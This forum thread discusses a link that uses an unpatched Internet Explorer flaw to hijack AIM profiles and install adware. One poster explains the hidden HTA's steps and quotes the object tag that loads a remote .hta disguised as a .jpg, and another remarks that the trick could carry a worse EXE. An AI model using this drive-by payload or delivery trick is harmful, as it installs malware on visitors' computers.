Why IE sucks.

[CTho9305]

DO NOT CLICK THIS LINK if you use IE. It hijacks your AIM profile and installs adware. From looking at the source, it looks like it gets IE to run an hta (html application, they run with normal user privileges and can access files) which has an EXE stored in it (v1, v2, v3 in the .hta) and then uses that encoded EXE to own you.

 

[Narse]

Using Safari here so no worries 😀

 

[BigJ]

don't they give a link on their site to remove it also?

 

[CTho9305]

Ok, so what the HTA does:
start minimized
force the window to move offscreen
disable error messages
disable right-clicks
convert the hex-encoded EXE data to the actual binary and write it.

The HTA is probably launched from that link by this:

"<object data=http://www.realphx.com/project/iav.hta?.jpg>"

I'm guessing the .jpg at the end makes the crappy browser assume the file is safe and run the HTA without intervention.

Originally posted by: BigJ
don't they give a link on their site to remove it also?

Does that make IE's retarded security model any more acceptable? All you have to do is copy their site, put in a really malicious EXE, and NOT provide an uninstall to really abuse it.

 

[FreshPrince]

Originally posted by: CTho9305
DO NOT CLICK THIS LINK if you use IE. It hijacks your AIM profile and installs adware. From looking at the source, it looks like it gets IE to run an hta (html application, they run with normal user privileges and can access files) which has an EXE stored in it (v1, v2, v3 in the .hta) and then uses that encoded EXE to own you.

Funny, I use IE, clicked on the link and no adware...

Why?

Because I RTFM and it showed me how not to surf the web like a complete gnubie and use some common sense. You wouldn't let a complete stranger in your house and let them do whatever they want would you? No? Then why not exercise the same common sense with your browser? 😉

-FP

 

[CTho9305]

Originally posted by: FreshPrince

Originally posted by: CTho9305
DO NOT CLICK THIS LINK if you use IE. It hijacks your AIM profile and installs adware. From looking at the source, it looks like it gets IE to run an hta (html application, they run with normal user privileges and can access files) which has an EXE stored in it (v1, v2, v3 in the .hta) and then uses that encoded EXE to own you.

Funny, I use IE, clicked on the link and no adware...

Why?

Because I RTFM and it showed me how not to surf the web like a complete gnubie and use some common sense. You wouldn't let a complete stranger in your house and let them do whatever they want would you? No? Then why not exercise the same common sense with your browser? 😉

-FP

I use a browser that doesn't require screwing with settings to get even remotely secure. Glad you didn't get hijacked 😉.

 

Posting the link #2.
All the people who get hijacked because you posted it #1.

 

[dighn]

i get an installation request. what am i supposed to see?

 

[Turkish]

YAIEBT: Yet another internet explorer bashing thread?

<- using IE, nothing happened.

 

[Eli]

Hmm...

I don't want to click it and find out. 😛

But I would like to know if my IE is secure. How can I check?

 

[Shaftatplanetquake]

Install prompt. I clicked no. Popups galore. ALT F4. My computer is the same as it was before I clicked the link.

If more people knew it was this simple, there would be less money in fixing software problems for customers. So, basically, I like idiots.

 

[dighn]

i think it only affects unpatched ie. if your ie is vulnerable, just going to that web site would do it. the prompt is for something else i think.

here's some info on it

http://www.siena.edu/antivirus/viruses/realphx.htm

http://www.ncsu.edu/resnet/pages/security/realphx.php

 

[Danman]

Originally posted by: dighn
i get an installation request. what am i supposed to see?

If you accept it it screws your computar up.